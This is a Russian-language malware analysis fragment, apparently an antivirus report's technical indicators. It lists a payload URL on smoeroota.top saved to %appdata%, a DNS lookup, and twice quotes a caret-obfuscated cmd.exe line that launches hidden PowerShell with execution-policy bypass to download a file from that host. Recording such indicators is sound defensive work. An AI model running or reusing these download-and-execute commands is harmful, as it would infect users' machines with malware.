Техническая информация
- http://smoeroota.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^Owe^rsheLl^.eXe -^eXe^cuTI^oNp^Olicy B^YpaSS -NOp^rof^iLE ^-^WI^NDOWS^T^yle^ ^HiDDEN (n^ew-OBje^ct^ S^y^S^Tem.^NE^t.W^EB^c^LiEnT).D^oWN^LO^aDfi^Le(^'http://smoeroota.top/rea...
- DNS ASK sm###oota.top
- '<SYSTEM32>\cmd.exe' /c "P^Owe^rsheLl^.eXe -^eXe^cuTI^oNp^Olicy B^YpaSS -NOp^rof^iLE ^-^WI^NDOWS^T^yle^ ^HiDDEN (n^ew-OBje^ct^ S^y^S^Tem.^NE^t.W^EB^c^LiEnT).D^oWN^LO^aDfi^Le(^'http://smoeroota.top/rea...' (со скрытым окном)